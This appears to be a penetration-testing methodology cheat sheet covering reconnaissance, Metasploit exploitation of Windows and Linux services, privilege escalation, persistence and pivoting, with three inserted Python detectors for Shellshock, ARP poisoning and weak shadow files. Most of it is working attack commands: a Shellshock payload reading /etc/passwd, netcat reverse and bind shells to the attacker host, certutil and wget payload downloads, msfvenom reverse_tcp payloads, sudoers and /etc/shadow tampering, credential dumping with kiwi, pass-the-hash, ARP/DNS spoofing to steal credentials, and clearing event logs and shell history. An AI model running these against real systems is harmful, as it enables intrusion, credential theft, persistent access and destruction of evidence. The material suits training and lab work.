
Penetration Testing Methodology

---------------------------------------------------------------------------------
Prepared By / Mohamed Nabil Diab
[Link]
---------------------------------------------------------------------------------

Content

1. Information Gathering
• OSINT & Public resources
• Host Discovery
• Port Scanning
• Services & OS Detection
2. Enumeration
• Service Enumeration
3. Vulnerability Assessment
• Detect Vulnerable Services
• Search for Relative Exploits
4. Exploitation
• Starting MSF
• Windows Exploitation
• Linux Exploitation
• Network Exploitation
5. Post Exploitation
• Pre Post Exploitation
• Windows Post Exploitation
• Linux Post Exploitation
6. Web Application Pentesting

Passive Information Gathering

Tool | Type | Syntax | Description
host | command | $ host <domain/Ip> | name resolution
[Link] | web-file | domain/[Link] | lists the site's web pages
[Link] | web-file | domain/[Link] | lists the site's web pages
Whois | command | $ whois <domain/Ip> | registration information: dates, addresses, phone numbers and Ip addresses
[Link] | website | [Link] | same whois information
netcraft | website | [Link] | same whois information and Ip addresses
dnsrecon | command | $ dnsrecon <domain/Ip> | DNS records
dnsdumpster | website | [Link] | name servers
dnsenum | command | $ dnsenum <domain/Ip> | DNS info
wafw00f | command | $ wafw00f <domain/Ip> | checks whether a (web application) firewall is in front of the site
sublist3r | command | $ sublist3r <domain/Ip> | searches for subdomains
dirbuster | command | $ dirb <domain URL> | directory navigation
theHarvester | command | $ theHarvester <domain/Ip> | searches for emails
haveibeenpwned | website | [Link] | checks whether an email has been breached or leaked
Netdiscover | command | $ netdiscover -i <nic> -r <subnet> | scan the LAN
nmap | command | $ nmap -options <domain/Ip> | does everything

Nmap Usage
a) Host Discovery
• -sn ➔ host discovery only, port scanning disabled.
• -n ➔ no DNS resolution.
• -Pn ➔ skip the ping: treat every host as up and scan it anyway.
b) Scanning Types
• -sS ➔ TCP SYN scan.
• -sT ➔ TCP connect scan.
• -sA ➔ TCP ACK scan.
• -sU ➔ UDP port scan.
c) Port Specification
• -p ➔ specify a port number or range.
• -p- ➔ scan all 65535 ports.
• -F ➔ fast scan of the most common ports.
d) Service & OS Detection
• -sV ➔ detect the versions of the running services.
• -sC ➔ run the default script set.
• -O ➔ detect the running OS.
• -A ➔ detect OS and versions and perform script scanning.
e) Output Formats
• -oN ➔ normal output format.
• -oX ➔ XML output format.
• -oG ➔ grepable output format.
• -oA ➔ all three output formats at once.
f) Detection Evasion
• -f ➔ fragment the scan packets.
• -D ➔ decoy scan: mix other Ips in with my Ip as apparent sources.
• -sI ➔ idle scan through a zombie host's Ip.
• --source-port ➔ specify a source port.
• -T0,1,2,3,4,5 ➔ scan timing template (0 is the slowest).
g) Nmap Scripts
• ls /usr/share/nmap/scripts (directory of nmap scripts)
• useful scripts: vuln, smb-protocols, smb-security-mode, smb-enum-groups, smb-enum-sessions, smb-enum-domains, smb-enum-users, smb-enum-shares, smb-os-discovery, http-enum, http-title, banner.
• nmap -A <target> (perform some scripts)
• nmap -sC <target> (perform the default scripts)
h) Importing Nmap result into MSF
• nmap -oX [Link] <target>
• service postgresql start
• msfconsole
• db_stats
• db_import [Link]
• hosts

Active Information Gathering

• I get my own IP address using ifconfig or ip a.
• I get the target's IP, for the domain I was given, from the /etc/hosts file.
• I ping the target to make sure it is active.
• Here the target did not reply to the ping, so I run an nmap scan using the -Pn option.
• The target may reply to the ping and still show nothing in the scan.
• In that case I add the -p- option so nmap scans all ports.
• Open ports come back; I run service detection on them with the -sV option.
• Now we have identified the open ports on the target, as well as the services and the OS. This is where the Information Gathering phase ends and the Enumeration phase begins.
------------------------------------------------------------------------------------
• Now we move on to phase 2: Enumeration.

Enumeration

Port 21 (FTP)
MSF modules:
• auxiliary/scanner/ftp/ftp_version
• auxiliary/scanner/ftp/ftp_login
• auxiliary/scanner/ftp/anonymous
Utilities:
• nmap --script ftp-anon <target>
• ftp target 21

Port 445 (SMB)
MSF modules:
• auxiliary/scanner/smb/smb_version
• auxiliary/scanner/smb/pipe_auditor (list the named pipes available over SMB on the samba server)
Utilities:
• nmap -sU --top-ports 25 <target>
• nmblookup -A <target> (NetBIOS computer name)
• smbclient -L <target> -N
• smbclient -L <target> -U user (check the user's browsable shares)
• smbclient //Ip/admin -U admin (browse the admin share)
• rpcclient -U "" -N <target> (check anonymous connection)
• smbmap -u user -p password -H Ip (check share permissions)
• enum4linux -u username -p password -U target (list all users)

Port 80 (HTTP)
MSF modules:
• auxiliary/scanner/http/apache_userdir_enum
• auxiliary/scanner/http/brute_dirs
• auxiliary/scanner/http/dir_scanner
• auxiliary/scanner/http/dir_listing
• auxiliary/scanner/http/http_put
• auxiliary/scanner/http/files_dir
• auxiliary/scanner/http/http_login
• auxiliary/scanner/http/http_header
• auxiliary/scanner/http/http_version
• auxiliary/scanner/http/robots_txt
Utilities:
• curl -I [Link]
• nc [Link] 80
• whatweb [Link]
• dirb [Link]
• nmap --script http-enum,http-title target

Port 3306 (MySQL)
MSF modules:
• auxiliary/scanner/mysql/mysql_version
• auxiliary/scanner/mysql/mysql_login
• auxiliary/admin/mysql/mysql_enum
• auxiliary/admin/mysql/mysql_sql
• auxiliary/scanner/mysql/mysql_file_enum
• auxiliary/scanner/mysql/mysql_hashdump
• auxiliary/scanner/mysql/mysql_schemadump
• auxiliary/scanner/mysql/mysql_writable_dirs
Utilities:
• mysql -u username -p -h target
• show databases;
• use DBname;
• show tables;
• select * from tablename;
• update tablename set passfield = MD5('newpassword') where userfield = 'username';

Port 22 (SSH)
MSF modules:
• auxiliary/scanner/ssh/ssh_version
• auxiliary/scanner/ssh/ssh_login

Port 25 (SMTP)
MSF modules:
• auxiliary/scanner/smtp/smtp_enum
Utilities:
• nmap --script banner <target>
• nc target 25
• > VRFY admin@[Link] (check whether the user admin exists)
• smtp-user-enum -U file -t target (check users on the server)
• sendemail -f sender -t recipient -s Ip -u Fakemail -m "Hi root, a fake from admin" -o tls=no (send email)
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
After we finish Enumeration and have collected all the details, we start a new phase: Vulnerability Assessment. Here I begin checking the running services to see whether any of them is vulnerable or has an exploit.

I scan all the ports and services and search for any way to exploit them, and I verify the versions: whether they are vulnerable, or patched and of no use to me.

Most Common Vulnerabilities

WebDAV (when we find a WebDAV extension in the web server)


▪ davtest -auth bob:password_123321 -url [Link]
------------------------------------------------------------------------------------
Shellshock (when we find cgi script running on the website)
▪ nmap --script http-shellshock --script-args "http-[Link]=/[Link]" <target>

------------------------------------------------------------------------------------
EternalBlue (when we find SMBv1 protocol)
▪ nmap -p 445 --script=smb-vuln-ms17-010 <target>

------------------------------------------------------------------------------------
Bluekeep (when we find RDP enabled)
▪ msfconsole
▪ search bluekeep
▪ auxiliary/scanner/rdp/cve_2019_0708_bluekeep

------------------------------------------------------------------------------------
Insecure RDP Service
(when we Find port 3389 closed but port 3333 open)
▪ msfconsole
▪ auxiliary/scanner/rdp/rdp_scanner
▪ set rport 3333

------------------------------------------------------------------------------------
• Now that we have identified our vulnerabilities, we move on to the most important phase, actually carrying out the intrusion: Exploitation. In it we pick the msf module that exploits the vulnerability and opens a meterpreter session on the target for us.

Metasploit Framework

1. Database Server
• /etc/init.d/postgresql start
• OR
• service postgresql start
------------------------------------------------------------------------------------
2. Starting the MSF
• msfconsole -q
------------------------------------------------------------------------------------
3. Creating workspaces
• workspace -a <name> (add workspace)
• setg RHOSTS <Ip> (set global variable)
• workspace -d <name> (delete workspace)
• workspace -r <name> <new-name> (rename workspace)
------------------------------------------------------------------------------------
4. Search Queries
• search type:exploit name:bluekeep
• search type:auxiliary platform:windows
------------------------------------------------------------------------------------

Windows Exploitation
1. HTTP (80) WebDAV (cadaver)
• kali
• cadaver [Link]
• >> put /usr/share/webshells/asp/[Link]
• open the browser and access the file then run commands.

2. HTTP (80) WebDAV (MSF)
• msfconsole
• exploit/windows/iis/iis_webdav_upload_asp
• set HttpUsername bob
• set HttpPassword password_123321
• set PATH /webdav/metasploit%RAND%.asp
---------------------------------------------------------------------------------
3. HTTP (80) Shellshock
• user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
• open Burpsuite and run the above command
• OR msfconsole
• exploit/multi/http/apache_mod_cgi_bash_env_exec
• set TARGETURI /[Link]
• set LHOST eth1
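The `() { :; };` User-Agent shown above is the same string a defender hunts for in web server logs. As an added example that is not part of the cheat sheet, the code below flags Shellshock function headers in Referer and User-Agent fields of Apache combined-format access logs; the log lines are constructed, not captured traffic.

```python
import re

# Shellshock (CVE-2014-6271) probes place a bash function definition "() {" in a
# request header that a CGI server copies into the environment. Match the function
# header only, allowing the whitespace variants seen in the wild ("(){", "( ) {").
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed access-log lines (not real traffic): one probe in the User-Agent,
# one benign browser request, one probe carried in the Referer header instead.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '200 512 "-" "() { :; }; echo; echo; /bin/bash -c \'cat /etc/passwd\'"',
    '203.0.113.6 - - [01/Jan/2024:10:00:02 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '500 0 "() { ignored; }; echo vulnerable" "curl/7.68.0"',
]


def is_shellshock_payload(value: str) -> bool:
    """True when a header value carries a bash function header "() {"."""
    return bool(SHELLSHOCK_RE.search(value))


def scan_access_log(lines):
    """Return one finding (client_ip, requested_path, header_field) per log line
    whose Referer or User-Agent carries a Shellshock function header. Lines that
    are not in combined format are skipped rather than guessed at."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for field in ("referer", "ua"):
            if is_shellshock_payload(m.group(field)):
                findings.append((m.group("ip"), m.group("path"), field))
                break
    return findings


if __name__ == "__main__":
    for ip, path, field in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"shellshock probe from {ip} against {path} via {field}")
```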
------------------------------------------------------------------------------------
4. HTTP (80) HttpFileServer httpd 2.3
• exploit/windows/http/rejetto_hfs_exec
------------------------------------------------------------------------------------
5. HTTP (8080) Apache Tomcat 8.5.19
• exploit/multi/http/tomcat_jsp_upload_bypass
------------------------------------------------------------------------------------
6. SMB (445) EternalBlue
• exploit/windows/smb/ms17_010_eternalblue
------------------------------------------------------------------------------------
7. SMB (445) server PsExec
• msfconsole
• auxiliary/scanner/smb/smb_login
• set user_file /usr/share/…./common_users.txt

• set pass_file /usr/share/…/unix_passwords.txt
• set verbose false
• exploit/windows/smb/psexec
• set smbuser Administrator
• set smbpass qwertyuiop
------------------------------------------------------------------------------------
8. RDP (3389) BlueKeep
• exploit/windows/rdp/cve_2019_0708_bluekeep_rce
• show targets
• set target 2
------------------------------------------------------------------------------------
9. RDP (3389) Brute-Force
• kali
• hydra -L [Link] -P [Link] rdp://[Link]:3333
• xfreerdp /u:user /p:password /v:[Link]:3333
------------------------------------------------------------------------------------
10. WinRM (5985)
• msfconsole
• auxiliary/scanner/winrm/winrm_login
• set user_file /usr/share/…./common_users.txt
• set pass_file /usr/share/…/unix_passwords.txt
• set password “anything”
• set verbose false
• auxiliary/scanner/winrm/winrm_auth_methods

• auxiliary/scanner/winrm/winrm_cmd
• set username Administrator
• set password Tinkerbell
• set cmd whoami
• exploit/windows/winrm/winrm_script_exec
• set username Administrator
• set password Tinkerbell
• set FORCE_VBS true
• meterpreter session opened
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------

Linux Exploitation
1. FTP (21) vsftpd 2.3.4
• exploit/unix/ftp/vsftpd_234_backdoor
------------------------------------------------------------------------------------
2. SAMBA (445) Samba smbd 3.X - 4.X
• exploit/linux/samba/is_known_pipename
------------------------------------------------------------------------------------
3. SSH (22) libssh 0.8.3 (protocol 2.0)
• auxiliary/scanner/ssh/libssh_auth_bypass
• set spawn_pty true
------------------------------------------------------------------------------------
4. SMTP (25) Haraka smtpd 2.8.8
• set SRVPORT 9898
• set email_to root@[Link]
• set payload linux/x64/meterpreter_reverse_http
• set LHOST eth1

Network Exploitation
1. NetBIOS Hacking (perform pivoting)
• nmap -p 445 --script smb-enum-users <target1>
• vim [Link]
• hydra -L [Link] -P /…/unix_passwords.txt smb://target
• msfconsole
• exploit/windows/smb/psexec
• after obtaining meterpreter session 1
• migrate -N [Link]
• shell
• ping -n 3 <target2>
• sessions 1
• run autoroute -s <target2>
• kali
• cat /etc/[Link]
• notice the last line <9050> port
• msfconsole
• auxiliary/server/socks_proxy
• set srvport 9050
• set version 4a
• kali
• proxychains nmap -sV -Pn -p 445 -sT <target2>
• shell
• net view <target2> (display shared disks)
• net use D: \\target2\Documents
• dir D:
• type [Link]

2. SNMP Analysis
• nmap -sU -p 161 <target>
• ls /usr/share/nmap/scripts/ | grep -e "snmp"
• nmap -sU -p 161 --script snmp-* <target>
• find the snmp users from nmap result
• vim [Link]
• hydra -L [Link] -P …/unix_passwords.txt smb://target
------------------------------------------------------------------------------------
3. DNS & SMB Relay Attack
(we will perform arp poisoning and dns spoofing to steal auth creds)
• We have three terminals attacker, target, server
• msfconsole
• use exploit/windows/smb/smb_relay
• set lhost <attacker>
• set srvhost <attacker>
• set smbhost <server>
• set payload windows/meterpreter/reverse_tcp
• kali
• echo "attacker-Ip server-domain" > dns (fake dns hosts file)
• dnsspoof -i eth1 -f dns (dns spoofing)
• echo 1 > /proc/sys/net/ipv4/ip_forward (enable IP forwarding so traffic keeps flowing)
• arpspoof -i eth1 -t target-Ip server-Ip (arp poisoning, both directions)
• arpspoof -i eth1 -t server-Ip target-Ip
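From the victim's side, the arpspoof step above leaves a visible trace: one MAC address suddenly answers for the server, the gateway and the attacker at once, and known hosts change MAC. As an added example that is not part of the cheat sheet, the code below checks an `ip neigh show` dump against a recorded baseline; the neighbour table and baseline are constructed, not captured from a real host.

```python
import re
from collections import defaultdict

# One line per neighbour as printed by `ip neigh show`. Entries without a MAC
# (FAILED/INCOMPLETE) have no lladdr and are skipped; trailing flags such as
# "router" are tolerated.
NEIGH_RE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})\b"
)

# Constructed neighbour table of a victim while arpspoof runs: the attacker's MAC
# (08:00:27:aa:aa:aa) now answers for the gateway (.1), the file server (.20) and
# the attacker's own address (.66).
SAMPLE_IP_NEIGH = """\
192.168.56.1 dev eth1 lladdr 08:00:27:aa:aa:aa REACHABLE
192.168.56.20 dev eth1 lladdr 08:00:27:aa:aa:aa STALE
192.168.56.66 dev eth1 lladdr 08:00:27:aa:aa:aa REACHABLE
192.168.56.30 dev eth1 lladdr 08:00:27:00:00:30 DELAY
192.168.56.99 dev eth1  FAILED
fe80::1 dev eth1 lladdr 08:00:27:00:00:01 router REACHABLE
"""

# Constructed baseline recorded earlier, as a monitoring agent would store it.
BASELINE = {
    "192.168.56.1": "08:00:27:00:00:01",
    "192.168.56.20": "08:00:27:00:00:20",
    "192.168.56.30": "08:00:27:00:00:30",
}


def parse_ip_neigh(text):
    """Parse `ip neigh show` output into {"ip", "dev", "mac"} dicts (MAC lowercased)."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line)
        if m:
            entries.append({"ip": m["ip"], "dev": m["dev"], "mac": m["mac"].lower()})
    return entries


def find_arp_anomalies(entries, baseline):
    """Return (kind, subject, detail) tuples for two symptoms of ARP poisoning:
    'duplicate_mac'     one MAC bound to several IPs of the same family on one
                        interface (a dual-stack host's v4 and v6 legitimately share
                        a MAC, so families are counted separately);
    'baseline_mismatch' an IP whose MAC no longer matches the recorded baseline."""
    findings = []
    ips_by_mac = defaultdict(set)
    for e in entries:
        family = "v6" if ":" in e["ip"] else "v4"
        ips_by_mac[(e["dev"], e["mac"], family)].add(e["ip"])
        expected = baseline.get(e["ip"])
        if expected is not None and expected.lower() != e["mac"]:
            findings.append(("baseline_mismatch", e["ip"],
                             f"expected {expected}, saw {e['mac']}"))
    for (dev, mac, _family), ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate_mac", mac, f"{dev}: {', '.join(sorted(ips))}"))
    return findings


if __name__ == "__main__":
    for kind, subject, detail in find_arp_anomalies(parse_ip_neigh(SAMPLE_IP_NEIGH), BASELINE):
        print(f"{kind:18} {subject:20} {detail}")
```

A host with several IPv4 aliases on one NIC will also trip the duplicate check, so a real deployment allowlists known multi-homed hosts.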

Pre-Post Exploitation
1. Open a local server on Kali
• cd <required directory>
• python -m SimpleHTTPServer 80

2. Download files into windows (cmd)
• certutil -urlcache -f Kali-Ip/file-name file-name
------------------------------------------------------------------------------------
3. Download files into linux (bash)
• wget [Link]
------------------------------------------------------------------------------------
4. Transfer files to the target using netcat
• nc -nvlp 1234 > filename (on target open a listener)
• nc -nv target-Ip 1234 < filename (on Kali connect)
------------------------------------------------------------------------------------
5. Setup a bind shell
• nc -nvlp 1234 -e [Link] (on target open listener)
• nc -nv target-Ip 1234 (on Kali connect)
------------------------------------------------------------------------------------
6. Setup a reverse shell
• nc -nvlp 1234 (on Kali open a listener)
• ./[Link] -nv Kali-Ip 1234 -e [Link] (on target, connect back)

Windows Post Exploitation
1. Windows Local Enumeration
a. System Information
• meterpreter
• getuid
• sysinfo
• shell
• systeminfo
• wmic qfe get Caption,Description,HotFixID,InstalledOn
b. Users & Groups
• meterpreter
• getuid
• getprivs
• use post/windows/gather/enum_logged_on_users
• shell
• whoami
• whoami /priv
• net users

• net user administrator
• net localgroup
• net localgroup administrators
c. Network Information
• meterpreter
• ipconfig /all
• shell
• route print
• arp -a
• netstat -ano
d. Processes & Services
• meterpreter
• ps
• pgrep [Link]
• migrate PID
• shell
• net start
• wmic service list brief
• tasklist /svc
• schtasks /query /fo LIST
e. Automating Windows Local Enumeration
• msfconsole
• post/windows/gather/win_privs
• post/windows/gather/enum_logged_on_users
• post/windows/gather/checkvm
• post/windows/gather/enum_applications
• post/windows/gather/enum_computers
• post/windows/gather/enum_patches
• copy this script [Link]
• kali
• vim jaws-enum.ps1

• meterpreter
• cd C:\\
• mkdir temp
• cd temp
• upload /root/Desktop/jaws-enum.ps1
• shell
• [Link] -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename [Link]
• download [Link]
------------------------------------------------------------------------------------
2. Transferring files into windows
• kali
• cd /usr/share/windows-resources
• python -m SimpleHTTPServer 80
• windows shell
• certutil -urlcache -f Kali-Ip/file-name file-name
------------------------------------------------------------------------------------
3. Upgrading Windows Shells
• msfconsole
• sessions -u (shell-ID)
------------------------------------------------------------------------------------
4. Windows Privilege Escalation
a. Windows Kernel Exploits
• post/multi/recon/local_exploit_suggester
• run any module from the result to elevate privileges
b. UAC Bypass
• exploit/windows/local/bypassuac_injection
• set session <session-ID>
• set target 1 (windows x64, from show targets)
• set payload windows/x64/meterpreter/reverse_tcp (number 33 in show payloads)
c. PrivescCheck
• get this script [Link]
• paste it on the target in PrivescCheck.ps1
• [Link] -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
• use the credentials resulted (username:password)
• [Link] /user:username cmd
• enter the password
• you will get a privileged cmd
d. UAC Bypass: UACMe
(when we get admin user with limited privileges)
• after obtaining a meterpreter session with limited privileges
account <admin>
• migrate -N [Link]
• shell
• net localgroup Administrators (confirm that admin is a member)
• kali
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my Ip> LPORT=4444 -f exe > [Link]
• meterpreter session
• cd C:\\Users\\<admin>\\AppData\\Local\\Temp
• upload /root/Desktop/tools/UACME/[Link] .
• upload /root/[Link] .
• msfconsole
• exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost <my Ip>
• set lport 4444
• run

• meterpreter session opened
• shell
• [Link] 23 C:\Users\<admin>\AppData\Local\Temp\[Link]
• we will find new privileged session opened in the handler.
e. Impersonation
(when login with user and need to access another user folder)
• meterpreter session
• load incognito
• list_tokens -u
• impersonate_token <Token name>
• getuid
f. Unattended Installation
• powershell
• cat C:\windows\Panther\[Link]
• search for encoded password
• decode the password via any website
• [Link] /user:Administrator cmd
• msfconsole
• exploit/windows/misc/hta_server
• run
• copy the <url>
• administrator cmd
• [Link] <url>
• we obtain a meterpreter session from Administrator

5. Windows Persistence
a. Persistence Service
• meterpreter (must be privileged)
• msfconsole
• exploit/windows/local/persistence_service
• set session 1
• open another tab msfconsole
• exploit/multi/handler
• set lhost eth1
• set payload windows/meterpreter/reverse_tcp
• if session 1 terminated we will obtain another session.
b. Persistence RDP
• post/windows/manage/enable_rdp
• meterpreter (must be Administrator)
• ps -N [Link]
• run getgui -e -u alice -p hack_123321
• xfreerdp /u:alice /p:hack_123321 /v:target
------------------------------------------------------------------------------------
6. Dumping & Cracking Windows Hashes
➢ Kiwi Extension
• meterpreter
• load kiwi
• creds_all
• lsa_dump_sam
• lsa_dump_secrets
➢ Pass The Hash
• after having users’ hashes
• exploit/windows/smb/psexec
• set smbuser <username>
• set smbpassword <pair of hashes>

• set target Native\ upload
➢ Cracking
• john --format=NT [Link] --wordlist=/usr/share/wordlists/[Link]
➢ OR
• meterpreter
• migrate -N [Link]
• hashdump
• auxiliary/analyze/crack_windows
• set custom_wordlist /usr/share/…/unix_passwords.txt
• creds
------------------------------------------------------------------------------------
7. Pivoting
• meterpreter
• migrate -N [Link]
• ipconfig
• run autoroute -s <second target Ip>
• use auxiliary/scanner/portscan/tcp
• set rhosts <second target Ip>
• set ports 1-1000
• meterpreter
• portfwd add -l 1234 -p 80 -r <second target Ip>
• nmap -sV -sS -p 1234 localhost
• msfconsole
• exploit/windows/http/badblue_passthru
• set payload windows/meterpreter/bind_tcp
------------------------------------------------------------------------------------
8. Clearing Windows Event Logs
• meterpreter
• clearev
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------

Linux Post Exploitation


1. Linux Local Enumeration
a. System Information
• meterpreter
• sysinfo
• shell
• hostname
• cat /etc/issue (linux distro)
• cat /etc/*release (distro releases)
• uname -a (kernel version)
• lscpu (CPU info)
• df -h (storage info)
b. Users & Groups
• shell
• whoami (current user)
• groups <username> (groups the user belongs to)
• cat /etc/passwd (all system users)
• groups (all system groups)
• who (current logged in users)
• lastlog (recently logged in users)
c. Network Information
• meterpreter
• ifconfig (NICs)
• netstat (open ports)
• route (routing table)
• shell
• cat /etc/networks (subnets and networks)
• cat /etc/hosts (mapping domain to Ip)
• cat /etc/[Link] (DNS address)
d. Processes & Cron Jobs
• meterpreter
• ps (list all running process)
• pgrep <processname> (search for specific PID)
• shell
• ls -la /etc/cron* (list all cron jobs)
• top (display real time processes)
e. Automating Linux Local Enumeration
• msfconsole
• post/linux/gather/enum_configs
• post/multi/gather/env
• post/linux/gather/enum_network
• post/linux/gather/enum_protections
• post/linux/gather/enum_system
• post/linux/gather/checkcontainer
• post/linux/gather/checkvm
• post/linux/gather/enum_users_history
• Copy this script [Link]
• kali
• vim [Link]
• meterpreter
• cd /tmp
• upload /root/[Link]
• shell
• chmod +x [Link]
• ./[Link]

2. Transferring files into linux
• kali
• cd /usr/share/windows-resources
• python -m SimpleHTTPServer 80
• linux shell
• wget Kali-Ip/file-name
------------------------------------------------------------------------------------
3. Upgrading Linux Shells
• msfconsole
• sessions -u (shell-ID)
➢ OR
• Shell
• /bin/bash -i
------------------------------------------------------------------------------------
4. Linux Privilege Escalation
a. Exploit Cron Jobs
(when we find a file’s timestamp changed periodically)
• find / -name <filename>
• ls -l <the other path including the same file>
• grep -nri "other/path/to/filename" /usr or /etc or /opt…
• after finding the script in any directory
• vim <the found script> and make it contain:
#!/bin/bash
echo "student ALL=NOPASSWD:ALL" >> /etc/sudoers
• sudo -l
• sudo su (now we obtain a root user)
b. Exploiting Setuid Programs
(when we find a file’s binary calling another file binary)
• ls -l (found file1 with s permission)

• file <file1> (ELF binary file)
• strings <file1> (find file2 in the result)
• rm <file2> (delete file2)
• cp /bin/bash <file2> (replace file2 with bash shell)
• ./<file1> (execute file1 to call file2)
• we obtain a shell with root privileges.
c. Rootkit Scanner
• shell
• ps aux (search for a process that runs a root bash shell)
• cat /bin/check-down
• command -v chkrootkit (find the location)
• /bin/chkrootkit -V (find the version)
• searchsploit chkrootkit 0.49


• msfconsole
• exploit/unix/local/chkrootkit
• set session 1
• set lhost eth1
• set chkrootkit /bin/chkrootkit
• run (new session opened with root privileges)

d. Detect Weak Permissions
• shell
• find / -not -type l -perm -o+w (check writable files)
• found /etc/shadow in the result
• cat /etc/shadow (found that root has no hash)
• openssl passwd -1 -salt abc password (generate hash)
• copy the hash into /etc/shadow
• su
• enter password
• we will get a root access
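The two conditions this step relies on, a world-writable /etc/shadow and an account whose password field is empty, are exactly what a hardening check should catch first. As an added example that is not part of the cheat sheet, the code below audits a shadow file's contents and file modes; the shadow content and the temporary files are constructed for the demo.

```python
import os
import stat
import tempfile

# Constructed /etc/shadow content (not from a real system). root's password field
# is empty, which is the "root has no hash" condition above; "intruder" carries an
# MD5-crypt ($1$) hash of the kind `openssl passwd -1` emits, out of place beside
# the $6$ (SHA-512) hash used by the legitimate account. Hash values are placeholders.
SAMPLE_SHADOW = """\
root::19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
student:$6$c0nstructed$PlaceholderNotARealHashValue0000000000000000000000000000000000000:19000:0:99999:7:::
intruder:$1$abc$PlaceholderMd5CryptValue00:19000:0:99999:7:::
backup:!:19000:0:99999:7:::
"""


def audit_shadow(text):
    """Return (user, reason) for each account whose password field either permits a
    passwordless login or uses the weak MD5-crypt scheme. Locked accounts ('*', '!')
    are fine and are not reported."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, pw = line.split(":")[:2]
        if pw == "":
            findings.append((user, "empty password field: login with no password"))
        elif pw.startswith("$1$"):
            findings.append((user, "MD5-crypt ($1$) hash, as 'openssl passwd -1' produces"))
    return findings


def world_writable(paths):
    """Paths any user can write to, the same test as `find / -not -type l -perm -o+w`:
    symlinks are skipped because their own mode bits are meaningless."""
    hits = []
    for p in paths:
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            continue
        if stat.S_ISLNK(st.st_mode):
            continue
        if st.st_mode & stat.S_IWOTH:
            hits.append(p)
    return hits


def demo():
    """Create a throwaway directory holding a world-writable copy of the sample
    shadow file and a correctly restricted one, then run both checks."""
    d = tempfile.mkdtemp()
    weak = os.path.join(d, "shadow_weak")
    good = os.path.join(d, "shadow_good")
    for path, mode in ((weak, 0o666), (good, 0o640)):
        with open(path, "w") as fh:
            fh.write(SAMPLE_SHADOW)
        os.chmod(path, mode)
    return world_writable([weak, good]), audit_shadow(SAMPLE_SHADOW)


if __name__ == "__main__":
    writable, weak_accounts = demo()
    print("world-writable:", writable)
    for user, reason in weak_accounts:
        print(f"{user}: {reason}")
```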
e. Editing Gone Wrong
• shell
• find / -user root -perm -4000 -exec ls -ldb {} \;
• sudo -l
• sudo man ls
• enter !/bin/bash
• we will obtain a root access
5. Linux Persistence
a. SSH Key
• meterpreter
• msfconsole
• post/linux/manage/sshkey_persistence
• set createsshfolder true
• run (an ssh key is added at the path shown in the output)
• kali
• cp <given path> <ssh_key>
• chmod 0400 <ssh_key>
• ssh -i <ssh_key> root@target
b. Cron Jobs
• ps -eaf
• echo "* * * * * cd /home/student/ && python -m SimpleHTTPServer" > cron
• crontab -i cron (install the file as the user's crontab)
• crontab -l
• kali
• curl [Link].local:8000
------------------------------------------------------------------------------------
6. Dumping & Cracking Linux Hashes
• msfconsole
• post/linux/gather/hashdump
• auxiliary/analyze/crack_linux
• set SHA512 true

7. Clearing Linux Tracks
• shell
• history -c
• cat /dev/null > ~/.bash_history
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------

Web Application Pentesting


• dirb <url> (list hidden directories)
• curl -X OPTIONS <url> (show allowed methods)
➢ Test all pages for allowed HTTP methods
• curl -X PUT <url> --upload-file <filename> (upload file)
• curl -X DELETE <url/filename> -v (delete file)
➢ Open Burp suite and perform some testing
➢ Navigate to <target-url/[Link]/> on the browser
➢ Navigate to <target-url/[Link]/> on the browser
------------------------------------------------------------------------------------
Wmap Enumeration
• msfconsole
• load wmap
• wmap_sites -a <target Ip>
• wmap_targets -t <url>
• wmap_run -t
• wmap_run -e
